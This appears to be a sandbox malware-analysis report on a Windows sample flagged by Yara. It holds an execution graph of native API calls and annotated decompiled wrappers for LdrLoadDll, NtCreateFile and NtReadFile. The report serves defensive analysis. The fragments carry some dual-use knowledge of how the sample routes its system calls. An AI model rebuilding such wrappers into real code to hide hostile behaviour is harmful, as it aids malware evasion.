                                                Execution Graph

                                                Execution Coverage:2.3%
                                                Dynamic/Decrypted Code Coverage:2.4%
                                                Signature Coverage:5.9%
                                                Total number of Nodes:580
                                                Total number of Limit Nodes:72

                                                Graph

                                                execution_graph 61575 41d450 61578 419bf0 61575->61578 61579 419c16 61578->61579 61590 408b60 61579->61590 61581 419c22 61589 419c69 61581->61589 61598 40d170 61581->61598 61583 419c37 61586 419c4c 61583->61586 61646 418930 61583->61646 61610 40a610 61586->61610 61587 419c5b 61588 418930 2 API calls 61587->61588 61588->61589 61591 408b6d 61590->61591 61649 408ab0 61590->61649 61593 408b74 61591->61593 61661 408a50 61591->61661 61593->61581 61599 40d19c 61598->61599 62076 40a010 61599->62076 61601 40d1ae 62080 40d080 61601->62080 61604 40d1e1 61608 418710 2 API calls 61604->61608 61609 40d1f2 61604->61609 61605 40d1c9 61606 40d1d4 61605->61606 61607 418710 2 API calls 61605->61607 61606->61583 61607->61606 61608->61609 61609->61583 61611 40a635 61610->61611 61612 40a010 LdrLoadDll 61611->61612 61613 40a68c 61612->61613 62099 409c90 61613->62099 61615 40a6b2 61645 40a903 61615->61645 62108 4133a0 61615->62108 61617 40a6f7 61617->61645 62111 4079d0 61617->62111 61619 40a73b 61619->61645 62118 418780 61619->62118 61623 40a791 61624 40a798 61623->61624 62130 418290 61623->62130 61626 41a0a0 2 API calls 61624->61626 61628 40a7a5 61626->61628 61628->61587 61629 40a7e2 61630 41a0a0 2 API calls 61629->61630 61631 40a7e9 61630->61631 61631->61587 61632 40a7f2 61633 40d200 3 API calls 61632->61633 61634 40a866 61633->61634 61634->61624 61635 40a871 61634->61635 61636 41a0a0 2 API calls 61635->61636 61637 40a895 61636->61637 62135 4182e0 61637->62135 61640 418290 2 API calls 61641 40a8d0 61640->61641 61641->61645 62140 4180a0 61641->62140 61644 418930 2 API calls 61644->61645 61645->61587 61647 41894f ExitProcess 61646->61647 61648 4191e0 LdrLoadDll 61646->61648 61648->61647 61650 408ac3 61649->61650 61700 416e50 LdrLoadDll 61649->61700 61680 416d00 61650->61680 61653 408ad6 61653->61591 61654 408acc 61654->61653 61683 419530 61654->61683 61656 408b13 61656->61653 61694 4088d0 61656->61694 61658 408b33 61701 408320 LdrLoadDll 
61658->61701 61660 408b45 61660->61591 61662 408a6a 61661->61662 61663 419820 LdrLoadDll 61661->61663 62050 419820 61662->62050 61663->61662 61666 419820 LdrLoadDll 61667 408a91 61666->61667 61668 40cf70 61667->61668 61669 40cf89 61668->61669 62058 409e90 61669->62058 61671 40cf9c 62062 418460 61671->62062 61675 40cfc2 61676 40cfed 61675->61676 62069 4184e0 61675->62069 61678 418710 2 API calls 61676->61678 61679 408b85 61678->61679 61679->61581 61702 418880 61680->61702 61684 419549 61683->61684 61715 413a50 61684->61715 61686 419561 61687 41956a 61686->61687 61754 419370 61686->61754 61687->61656 61689 41957e 61689->61687 61772 418180 61689->61772 62028 406e20 61694->62028 61696 4088ea 61697 4088f1 61696->61697 62041 4070e0 61696->62041 61697->61658 61700->61650 61701->61660 61703 416d15 61702->61703 61705 4191e0 61702->61705 61703->61654 61706 4191f0 61705->61706 61708 419212 61705->61708 61709 413e50 61706->61709 61708->61703 61711 413e6a 61709->61711 61713 413e5e 61709->61713 61711->61708 61712 413fbc 61712->61708 61713->61711 61714 4142d0 LdrLoadDll 61713->61714 61714->61712 61716 413d85 61715->61716 61718 413a64 61715->61718 61716->61686 61718->61716 61780 417ed0 61718->61780 61720 413b90 61783 4185e0 61720->61783 61721 413b73 61840 4186e0 LdrLoadDll 61721->61840 61724 413b7d 61724->61686 61725 413bb7 61726 41a0a0 2 API calls 61725->61726 61728 413bc3 61726->61728 61727 413d49 61730 418710 2 API calls 61727->61730 61728->61724 61728->61727 61729 413d5f 61728->61729 61734 413c52 61728->61734 61849 413790 LdrLoadDll NtReadFile NtClose 61729->61849 61731 413d50 61730->61731 61731->61686 61733 413d72 61733->61686 61735 413cb9 61734->61735 61737 413c61 61734->61737 61735->61727 61736 413ccc 61735->61736 61842 418560 61736->61842 61739 413c66 61737->61739 61740 413c7a 61737->61740 61841 413650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 61739->61841 61742 413c97 61740->61742 61743 413c7f 61740->61743 61742->61731 61798 413410 61742->61798 61786 4136f0 
61743->61786 61745 413c70 61745->61686 61748 413d2c 61846 418710 61748->61846 61749 413c8d 61749->61686 61752 413caf 61752->61686 61753 413d38 61753->61686 61756 419381 61754->61756 61755 419393 61755->61689 61756->61755 61867 41a020 61756->61867 61758 4193b4 61870 413060 61758->61870 61760 419400 61760->61689 61761 4193d7 61761->61760 61762 413060 3 API calls 61761->61762 61765 4193f9 61762->61765 61764 41948a 61766 41949a 61764->61766 61996 419180 LdrLoadDll 61764->61996 61765->61760 61902 414390 61765->61902 61912 418ff0 61766->61912 61769 4194c8 61991 418140 61769->61991 61773 41819c 61772->61773 61774 4191e0 LdrLoadDll 61772->61774 62024 84fae8 LdrInitializeThunk 61773->62024 61774->61773 61775 4181b7 61777 41a0a0 61775->61777 61778 4195d9 61777->61778 62025 4188f0 61777->62025 61778->61656 61781 4191e0 LdrLoadDll 61780->61781 61782 413b44 61781->61782 61782->61720 61782->61721 61782->61724 61784 4185fc NtCreateFile 61783->61784 61785 4191e0 LdrLoadDll 61783->61785 61784->61725 61785->61784 61787 41370c 61786->61787 61788 418560 LdrLoadDll 61787->61788 61789 41372d 61788->61789 61790 413734 61789->61790 61791 413748 61789->61791 61793 418710 2 API calls 61790->61793 61792 418710 2 API calls 61791->61792 61794 413751 61792->61794 61795 41373d 61793->61795 61850 41a2b0 LdrLoadDll RtlAllocateHeap 61794->61850 61795->61749 61797 41375c 61797->61749 61799 41345b 61798->61799 61800 41348e 61798->61800 61801 418560 LdrLoadDll 61799->61801 61802 4135d9 61800->61802 61806 4134aa 61800->61806 61804 413476 61801->61804 61803 418560 LdrLoadDll 61802->61803 61810 4135f4 61803->61810 61805 418710 2 API calls 61804->61805 61807 41347f 61805->61807 61808 418560 LdrLoadDll 61806->61808 61807->61752 61809 4134c5 61808->61809 61812 4134e1 61809->61812 61813 4134cc 61809->61813 61863 4185a0 LdrLoadDll 61810->61863 61814 4134e6 61812->61814 61815 4134fc 61812->61815 61817 418710 2 API calls 61813->61817 61818 418710 2 API calls 61814->61818 61826 413501 61815->61826 61851 41a270 
61815->61851 61816 41362e 61819 418710 2 API calls 61816->61819 61820 4134d5 61817->61820 61821 4134ef 61818->61821 61823 413639 61819->61823 61820->61752 61821->61752 61822 413513 61822->61752 61823->61752 61826->61822 61854 418690 61826->61854 61827 413567 61831 41357e 61827->61831 61862 418520 LdrLoadDll 61827->61862 61829 413585 61832 418710 2 API calls 61829->61832 61830 41359a 61833 418710 2 API calls 61830->61833 61831->61829 61831->61830 61832->61822 61834 4135a3 61833->61834 61835 4135cf 61834->61835 61857 419e70 61834->61857 61835->61752 61837 4135ba 61838 41a0a0 2 API calls 61837->61838 61839 4135c3 61838->61839 61839->61752 61840->61724 61841->61745 61843 4191e0 LdrLoadDll 61842->61843 61844 413d14 61842->61844 61843->61844 61845 4185a0 LdrLoadDll 61844->61845 61845->61748 61847 41872c NtClose 61846->61847 61848 4191e0 LdrLoadDll 61846->61848 61847->61753 61848->61847 61849->61733 61850->61797 61864 4188b0 61851->61864 61853 41a288 61853->61826 61855 4191e0 LdrLoadDll 61854->61855 61856 4186ac NtReadFile 61855->61856 61856->61827 61858 419e94 61857->61858 61859 419e7d 61857->61859 61858->61837 61859->61858 61860 41a270 2 API calls 61859->61860 61861 419eab 61860->61861 61861->61837 61862->61831 61863->61816 61865 4191e0 LdrLoadDll 61864->61865 61866 4188cc RtlAllocateHeap 61865->61866 61866->61853 61868 41a04d 61867->61868 61997 4187c0 61867->61997 61868->61758 61871 413071 61870->61871 61872 413079 61870->61872 61871->61761 61901 41334c 61872->61901 62000 41b250 61872->62000 61874 4130cd 61875 41b250 2 API calls 61874->61875 61880 4130d8 61875->61880 61876 413126 61878 41b250 2 API calls 61876->61878 61882 41313a 61878->61882 61879 41b380 3 API calls 61879->61880 61880->61876 61880->61879 62011 41b2f0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 61880->62011 61881 413197 61883 41b250 2 API calls 61881->61883 61882->61881 62005 41b380 61882->62005 61884 4131ad 61883->61884 61886 4131ea 61884->61886 61888 41b380 3 API calls 61884->61888 61887 41b250 2 API 
calls 61886->61887 61889 4131f5 61887->61889 61888->61884 61890 41b380 3 API calls 61889->61890 61896 41322f 61889->61896 61890->61889 61892 413324 62013 41b2b0 LdrLoadDll RtlFreeHeap 61892->62013 61894 41332e 62014 41b2b0 LdrLoadDll RtlFreeHeap 61894->62014 62012 41b2b0 LdrLoadDll RtlFreeHeap 61896->62012 61897 413338 62015 41b2b0 LdrLoadDll RtlFreeHeap 61897->62015 61899 413342 62016 41b2b0 LdrLoadDll RtlFreeHeap 61899->62016 61901->61761 61903 4143a1 61902->61903 61904 413a50 8 API calls 61903->61904 61906 4143b7 61904->61906 61905 41440a 61905->61764 61906->61905 61907 4143f2 61906->61907 61908 414405 61906->61908 61909 41a0a0 2 API calls 61907->61909 61910 41a0a0 2 API calls 61908->61910 61911 4143f7 61909->61911 61910->61905 61911->61764 62017 418eb0 61912->62017 61915 418eb0 LdrLoadDll 61916 41900d 61915->61916 61917 418eb0 LdrLoadDll 61916->61917 61918 419016 61917->61918 61919 418eb0 LdrLoadDll 61918->61919 61920 41901f 61919->61920 61921 418eb0 LdrLoadDll 61920->61921 61922 419028 61921->61922 61923 418eb0 LdrLoadDll 61922->61923 61924 419031 61923->61924 61925 418eb0 LdrLoadDll 61924->61925 61926 41903d 61925->61926 61927 418eb0 LdrLoadDll 61926->61927 61928 419046 61927->61928 61929 418eb0 LdrLoadDll 61928->61929 61930 41904f 61929->61930 61931 418eb0 LdrLoadDll 61930->61931 61932 419058 61931->61932 61933 418eb0 LdrLoadDll 61932->61933 61934 419061 61933->61934 61935 418eb0 LdrLoadDll 61934->61935 61936 41906a 61935->61936 61937 418eb0 LdrLoadDll 61936->61937 61938 419076 61937->61938 61939 418eb0 LdrLoadDll 61938->61939 61940 41907f 61939->61940 61941 418eb0 LdrLoadDll 61940->61941 61942 419088 61941->61942 61943 418eb0 LdrLoadDll 61942->61943 61944 419091 61943->61944 61945 418eb0 LdrLoadDll 61944->61945 61946 41909a 61945->61946 61947 418eb0 LdrLoadDll 61946->61947 61948 4190a3 61947->61948 61949 418eb0 LdrLoadDll 61948->61949 61950 4190af 61949->61950 61951 418eb0 LdrLoadDll 61950->61951 61952 4190b8 61951->61952 61953 418eb0 LdrLoadDll 
61952->61953 61954 4190c1 61953->61954 61955 418eb0 LdrLoadDll 61954->61955 61956 4190ca 61955->61956 61957 418eb0 LdrLoadDll 61956->61957 61958 4190d3 61957->61958 61959 418eb0 LdrLoadDll 61958->61959 61960 4190dc 61959->61960 61961 418eb0 LdrLoadDll 61960->61961 61962 4190e8 61961->61962 61963 418eb0 LdrLoadDll 61962->61963 61964 4190f1 61963->61964 61965 418eb0 LdrLoadDll 61964->61965 61966 4190fa 61965->61966 61967 418eb0 LdrLoadDll 61966->61967 61968 419103 61967->61968 61969 418eb0 LdrLoadDll 61968->61969 61970 41910c 61969->61970 61971 418eb0 LdrLoadDll 61970->61971 61972 419115 61971->61972 61973 418eb0 LdrLoadDll 61972->61973 61974 419121 61973->61974 61975 418eb0 LdrLoadDll 61974->61975 61976 41912a 61975->61976 61977 418eb0 LdrLoadDll 61976->61977 61978 419133 61977->61978 61979 418eb0 LdrLoadDll 61978->61979 61980 41913c 61979->61980 61981 418eb0 LdrLoadDll 61980->61981 61982 419145 61981->61982 61983 418eb0 LdrLoadDll 61982->61983 61984 41914e 61983->61984 61985 418eb0 LdrLoadDll 61984->61985 61986 41915a 61985->61986 61987 418eb0 LdrLoadDll 61986->61987 61988 419163 61987->61988 61989 418eb0 LdrLoadDll 61988->61989 61990 41916c 61989->61990 61990->61769 61992 4191e0 LdrLoadDll 61991->61992 61993 41815c 61992->61993 62023 84fdc0 LdrInitializeThunk 61993->62023 61994 418173 61994->61689 61996->61766 61998 4191e0 LdrLoadDll 61997->61998 61999 4187dc NtAllocateVirtualMemory 61998->61999 61999->61868 62001 41b260 62000->62001 62002 41b266 62000->62002 62001->61874 62003 41a270 2 API calls 62002->62003 62004 41b28c 62003->62004 62004->61874 62006 41b2f0 62005->62006 62007 41a270 2 API calls 62006->62007 62009 41b34d 62006->62009 62008 41b32a 62007->62008 62010 41a0a0 2 API calls 62008->62010 62009->61882 62010->62009 62011->61880 62012->61892 62013->61894 62014->61897 62015->61899 62016->61901 62018 418ecb 62017->62018 62019 413e50 LdrLoadDll 62018->62019 62020 418eeb 62019->62020 62021 413e50 LdrLoadDll 62020->62021 62022 418f97 62020->62022 62021->62022 
62022->61915 62023->61994 62024->61775 62026 4191e0 LdrLoadDll 62025->62026 62027 41890c RtlFreeHeap 62026->62027 62027->61778 62029 406e30 62028->62029 62030 406e2b 62028->62030 62031 41a020 2 API calls 62029->62031 62030->61696 62037 406e55 62031->62037 62032 406eb8 62032->61696 62033 418140 2 API calls 62033->62037 62034 406ebe 62036 406ee4 62034->62036 62038 418840 2 API calls 62034->62038 62036->61696 62037->62032 62037->62033 62037->62034 62039 41a020 2 API calls 62037->62039 62044 418840 62037->62044 62040 406ed5 62038->62040 62039->62037 62040->61696 62042 4070fe 62041->62042 62043 418840 2 API calls 62041->62043 62042->61658 62043->62042 62045 4191e0 LdrLoadDll 62044->62045 62046 41885c 62045->62046 62049 84fb68 LdrInitializeThunk 62046->62049 62047 418873 62047->62037 62049->62047 62051 419843 62050->62051 62054 409b40 62051->62054 62055 409b64 62054->62055 62056 409ba0 LdrLoadDll 62055->62056 62057 408a7b 62055->62057 62056->62057 62057->61666 62059 409eb3 62058->62059 62061 409f30 62059->62061 62074 417f10 LdrLoadDll 62059->62074 62061->61671 62063 4191e0 LdrLoadDll 62062->62063 62064 40cfab 62063->62064 62064->61679 62065 418a50 62064->62065 62066 418a56 62065->62066 62067 4191e0 LdrLoadDll 62066->62067 62068 418a6f LookupPrivilegeValueW 62067->62068 62068->61675 62070 4184fc 62069->62070 62071 4191e0 LdrLoadDll 62069->62071 62075 84fed0 LdrInitializeThunk 62070->62075 62071->62070 62072 41851b 62072->61676 62074->62061 62075->62072 62077 40a037 62076->62077 62078 409e90 LdrLoadDll 62077->62078 62079 40a066 62078->62079 62079->61601 62081 40d09a 62080->62081 62089 40d150 62080->62089 62082 409e90 LdrLoadDll 62081->62082 62083 40d0bc 62082->62083 62090 4181c0 62083->62090 62085 40d0fe 62093 418200 62085->62093 62088 418710 2 API calls 62088->62089 62089->61604 62089->61605 62091 4191e0 LdrLoadDll 62090->62091 62092 4181dc 62091->62092 62092->62085 62094 41821c 62093->62094 62095 4191e0 LdrLoadDll 62093->62095 62098 8507ac LdrInitializeThunk 62094->62098 
62095->62094 62096 40d144 62096->62088 62098->62096 62100 409c9d 62099->62100 62101 409ca1 62099->62101 62100->61615 62102 409cba 62101->62102 62103 409cec 62101->62103 62145 417f50 LdrLoadDll 62102->62145 62146 417f50 LdrLoadDll 62103->62146 62105 409cfd 62105->61615 62107 409cdc 62107->61615 62109 40d200 3 API calls 62108->62109 62110 4133c6 62109->62110 62110->61617 62112 4079e9 62111->62112 62147 407710 62111->62147 62114 407a0d 62112->62114 62115 407710 19 API calls 62112->62115 62114->61619 62116 4079fa 62115->62116 62116->62114 62165 40d470 10 API calls 62116->62165 62119 4191e0 LdrLoadDll 62118->62119 62120 41879c 62119->62120 62284 84fea0 LdrInitializeThunk 62120->62284 62121 40a772 62123 40d200 62121->62123 62124 40d21d 62123->62124 62285 418240 62124->62285 62127 40d265 62127->61623 62128 418290 2 API calls 62129 40d28e 62128->62129 62129->61623 62131 4182ac 62130->62131 62132 4191e0 LdrLoadDll 62130->62132 62291 84fc60 LdrInitializeThunk 62131->62291 62132->62131 62133 40a7d5 62133->61629 62133->61632 62136 4191e0 LdrLoadDll 62135->62136 62137 4182fc 62136->62137 62292 84fc90 LdrInitializeThunk 62137->62292 62138 40a8a9 62138->61640 62141 4191e0 LdrLoadDll 62140->62141 62142 4180bc 62141->62142 62293 850078 LdrInitializeThunk 62142->62293 62143 40a8fc 62143->61644 62145->62107 62146->62105 62148 406e20 4 API calls 62147->62148 62153 40772a 62147->62153 62148->62153 62149 4079b9 62149->62112 62150 4079af 62151 4070e0 2 API calls 62150->62151 62151->62149 62153->62149 62153->62150 62155 418180 2 API calls 62153->62155 62157 418710 LdrLoadDll NtClose 62153->62157 62160 40a910 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 62153->62160 62163 4180a0 2 API calls 62153->62163 62166 417f90 62153->62166 62169 407540 62153->62169 62181 40d350 LdrLoadDll NtClose 62153->62181 62182 418010 LdrLoadDll 62153->62182 62183 418040 LdrLoadDll 62153->62183 62184 4180d0 LdrLoadDll 62153->62184 62185 407310 62153->62185 62201 405ea0 LdrLoadDll 
62153->62201 62155->62153 62157->62153 62160->62153 62163->62153 62165->62114 62167 417fac 62166->62167 62168 4191e0 LdrLoadDll 62166->62168 62167->62153 62168->62167 62170 407556 62169->62170 62202 417b00 62170->62202 62172 4076e1 62172->62153 62173 40756f 62173->62172 62223 407120 62173->62223 62175 407655 62175->62172 62176 407310 11 API calls 62175->62176 62177 407683 62176->62177 62177->62172 62178 418180 2 API calls 62177->62178 62179 4076b8 62178->62179 62179->62172 62180 418780 2 API calls 62179->62180 62180->62172 62181->62153 62182->62153 62183->62153 62184->62153 62186 407339 62185->62186 62263 407280 62186->62263 62189 418780 2 API calls 62190 40734c 62189->62190 62190->62189 62191 4073d7 62190->62191 62194 4073d2 62190->62194 62271 40d3d0 62190->62271 62191->62153 62192 418710 2 API calls 62193 40740a 62192->62193 62193->62191 62195 417f90 LdrLoadDll 62193->62195 62194->62192 62196 40746f 62195->62196 62196->62191 62275 417fd0 62196->62275 62198 4074d3 62198->62191 62199 413a50 8 API calls 62198->62199 62200 407528 62199->62200 62200->62153 62201->62153 62203 41a270 2 API calls 62202->62203 62204 417b17 62203->62204 62230 408160 62204->62230 62206 417b32 62207 417b70 62206->62207 62208 417b59 62206->62208 62211 41a020 2 API calls 62207->62211 62209 41a0a0 2 API calls 62208->62209 62210 417b66 62209->62210 62210->62173 62212 417baa 62211->62212 62213 41a020 2 API calls 62212->62213 62214 417bc3 62213->62214 62220 417e64 62214->62220 62236 41a060 62214->62236 62217 417e50 62218 41a0a0 2 API calls 62217->62218 62219 417e5a 62218->62219 62219->62173 62221 41a0a0 2 API calls 62220->62221 62222 417eb9 62221->62222 62222->62173 62224 40721f 62223->62224 62225 407135 62223->62225 62224->62175 62225->62224 62226 413a50 8 API calls 62225->62226 62228 4071a2 62226->62228 62227 4071c9 62227->62175 62228->62227 62229 41a0a0 2 API calls 62228->62229 62229->62227 62231 408185 62230->62231 62232 409b40 LdrLoadDll 62231->62232 62233 4081b8 62232->62233 62235 4081dd 
62233->62235 62239 40b340 62233->62239 62235->62206 62257 418800 62236->62257 62240 40b36c 62239->62240 62241 418460 LdrLoadDll 62240->62241 62242 40b385 62241->62242 62243 40b38c 62242->62243 62250 4184a0 62242->62250 62243->62235 62247 40b3c7 62248 418710 2 API calls 62247->62248 62249 40b3ea 62248->62249 62249->62235 62251 4184bc 62250->62251 62252 4191e0 LdrLoadDll 62250->62252 62256 84fbb8 LdrInitializeThunk 62251->62256 62252->62251 62253 40b3af 62253->62243 62255 418a90 LdrLoadDll 62253->62255 62255->62247 62256->62253 62258 4191e0 LdrLoadDll 62257->62258 62259 41881c 62258->62259 62262 850048 LdrInitializeThunk 62259->62262 62260 417e49 62260->62217 62260->62220 62262->62260 62264 407298 62263->62264 62265 4072b3 62264->62265 62266 409b40 LdrLoadDll 62264->62266 62267 413e50 LdrLoadDll 62265->62267 62266->62265 62268 4072c3 62267->62268 62269 4072cc PostThreadMessageW 62268->62269 62270 4072db 62268->62270 62269->62270 62270->62190 62272 40d3e3 62271->62272 62278 418110 62272->62278 62276 4191e0 LdrLoadDll 62275->62276 62277 417fec 62276->62277 62277->62198 62279 41812c 62278->62279 62280 4191e0 LdrLoadDll 62278->62280 62283 84fd8c LdrInitializeThunk 62279->62283 62280->62279 62281 40d40e 62281->62190 62283->62281 62284->62121 62286 4191e0 LdrLoadDll 62285->62286 62287 41825c 62286->62287 62290 84ffb4 LdrInitializeThunk 62287->62290 62288 40d25e 62288->62127 62288->62128 62290->62288 62291->62133 62292->62138 62293->62143 62297 84f900 LdrInitializeThunk

                                                Executed Functions

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 418690-4186d9 call 4191e0 NtReadFile
                                                C-Code - Quality: 37%
                                                			E00418690(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                                                				void* _t18;
                                                				void* _t27;
                                                				intOrPtr* _t28;
                                                
                                                				_t13 = _a4;
                                                				_t28 = _a4 + 0xc48;
                                                				E004191E0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                				_t4 =  &_a40; // 0x413a31
                                                				_t6 =  &_a32; // 0x413d72
                                                				_t12 =  &_a8; // 0x413d72
                                                				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
                                                				return _t18;
                                                			}






                                                0x00418693
                                                0x0041869f
                                                0x004186a7
                                                0x004186ac
                                                0x004186b2
                                                0x004186cd
                                                0x004186d5
                                                0x004186d9

                                                APIs
                                                • NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186D5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_Pcportk28.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID: 1:A$r=A$r=A
                                                • API String ID: 2738559852-4243674446
                                                • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                • Instruction ID: 4a498055f1de8b016eb86f05d4d9e2f0ef691a8d0c1c9b5c2f62b7bf89d1b75c
                                                • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                • Instruction Fuzzy Hash: D9F0F4B2200208ABCB04DF89CC80EEB77ADAF8C754F018248FA0D97241CA30E851CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 328 409b40-409b69 call 41af70 331 409b6b-409b6e 328->331 332 409b6f-409b7d call 41b390 328->332 335 409b8d-409b9e call 419720 332->335 336 409b7f-409b8a call 41b610 332->336 341 409ba0-409bb4 LdrLoadDll 335->341 342 409bb7-409bba 335->342 336->335 341->342
                                                C-Code - Quality: 100%
                                                			E00409B40(void* __eflags, void* _a4, intOrPtr _a8) {
                                                				char* _v8;
                                                 				struct _EXCEPTION_RECORD _v12;   // decompiler type guess; it is passed as LdrLoadDll's ModuleFileName, so this is really a UNICODE_STRING
                                                 				struct _OBJDIR_INFORMATION _v16; // decompiler type guess; receives LdrLoadDll's ModuleHandle output
                                                 				char _v536;                       // 0x208 bytes between _v536 and _v16: room for 0x104 (MAX_PATH) wide characters
                                                 				void* _t15;
                                                 				struct _OBJDIR_INFORMATION _t17;
                                                 				struct _OBJDIR_INFORMATION _t18;
                                                 				void* _t30;
                                                 				void* _t31;
                                                 				void* _t32;
                                                 
                                                 				_v8 =  &_v536;
                                                 				_t15 = E0041AF70( &_v12, 0x104, _a8);      // builds _v12 from the name in _a8 using the 0x104-WCHAR buffer; a zero result is returned as failure below
                                                 				_t31 = _t30 + 0xc;                          // caller pops the three pushed arguments (cdecl)
                                                 				if(_t15 != 0) {
                                                 					_t17 = E0041B390(__eflags, _v8);
                                                 					_t32 = _t31 + 4;
                                                 					__eflags = _t17;
                                                 					if(_t17 != 0) {
                                                 						E0041B610( &_v12, 0);                 // conditional post-processing of _v12; what it does is not recoverable from this excerpt
                                                 						_t32 = _t32 + 8;
                                                 					}
                                                 					_t18 = E00419720(_v8);                     // tried first: a non-zero result is stored in the handle slot and returned, so the load below is skipped
                                                 					_v16 = _t18;
                                                 					__eflags = _t18;
                                                 					if(_t18 == 0) {
                                                 						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed  (PathToFile=NULL, Flags=0, ModuleFileName=&_v12, ModuleHandle=&_v16); reached only when E00419720 yields nothing
                                                 						return _v16;
                                                 					}
                                                 					return _t18;
                                                 				} else {
                                                 					return _t15;
                                                 				}
                                                 			}













                                                 Instruction addresses: 0x00409b5c to 0x00409bba

                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BB2
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_Pcportk28.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                • Instruction ID: 0a0fff248a1c50f77d94468520b7725d30d267451342bd90074e2a3d68e37629
                                                • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                • Instruction Fuzzy Hash: B50152B5D0010DB7DF10DAE1EC42FDEB378AB54318F0041A6E908A7281F634EB54C795
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                control_flow_graph 343 4185da-418631 call 4191e0 NtCreateFile
                                                C-Code - Quality: 79%
                                                 			E004185DA(void* __ecx, void* __edx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {   // same wrapper as E004185E0 below, decoded from an entry point a few bytes too early; the struct parameter types are decompiler guesses
                                                 				long _t22;
                                                 				void* _t35;
                                                 
                                                 				asm("arpl [0xec8b55ad], ax");   // decoding artifact, not sample logic: the displacement 0xEC8B55AD is the byte sequence AD 55 8B EC, i.e. the real prologue push ebp; mov ebp, esp (55 8B EC) of E004185E0 swallowed into a bogus ARPL
                                                 				_t16 = _a4;
                                                 				_t4 = _t16 + 0xc40; // 0xc40
                                                 				E004191E0(_t35, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);   // shared pre-call helper: context _a4, field at _a4+0xc40, value at _a4+0x10, and the per-API constant 0x28 (0x2c for NtClose, 0x30 for NtAllocateVirtualMemory in the wrappers below)
                                                 				_t22 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed  (eleven arguments, as in the documented prototype: FileHandle, DesiredAccess, ObjectAttributes, IoStatusBlock, AllocationSize, FileAttributes, ShareAccess, CreateDisposition, CreateOptions, EaBuffer, EaLength)
                                                 				return _t22;
                                                 			}





                                                 Instruction addresses: 0x004185dd to 0x00418631

                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7,00408B13,FFFFFFFF,?,?,FFFFFFFF,00408B13,00413BB7,?,00408B13,00000060,00000000,00000000), ref: 0041862D
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_Pcportk28.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 162cdf515cac6653bfd59ed20980bc09eb686c5a20da41cb830c8ac6be52739c
                                                • Instruction ID: b9f2e3890fc73302027b6f747371c2d241cd4aec790cf57057c1563235709154
                                                • Opcode Fuzzy Hash: 162cdf515cac6653bfd59ed20980bc09eb686c5a20da41cb830c8ac6be52739c
                                                • Instruction Fuzzy Hash: EF01AFB6200109AFDB08DF88DC95EEB77A9BF8C354F158259FA0D97241DA30E851CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                control_flow_graph 346 4185e0-4185f6 347 4185fc-418631 NtCreateFile 346->347 348 4185f7 call 4191e0 346->348 348->347
                                                C-Code - Quality: 100%
                                                 			E004185E0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {   // cleanly decoded NtCreateFile wrapper; the struct parameter types are decompiler guesses (ObjectAttributes, IoStatusBlock, AllocationSize in the documented prototype)
                                                 				long _t21;
                                                 				void* _t31;
                                                 
                                                 				_t3 = _a4 + 0xc40; // 0xc40
                                                 				E004191E0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);   // shared pre-call helper with the NtCreateFile constant 0x28
                                                 				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed  (call site 0041862D, the same one E004185DA above ends in)
                                                 				return _t21;
                                                 			}





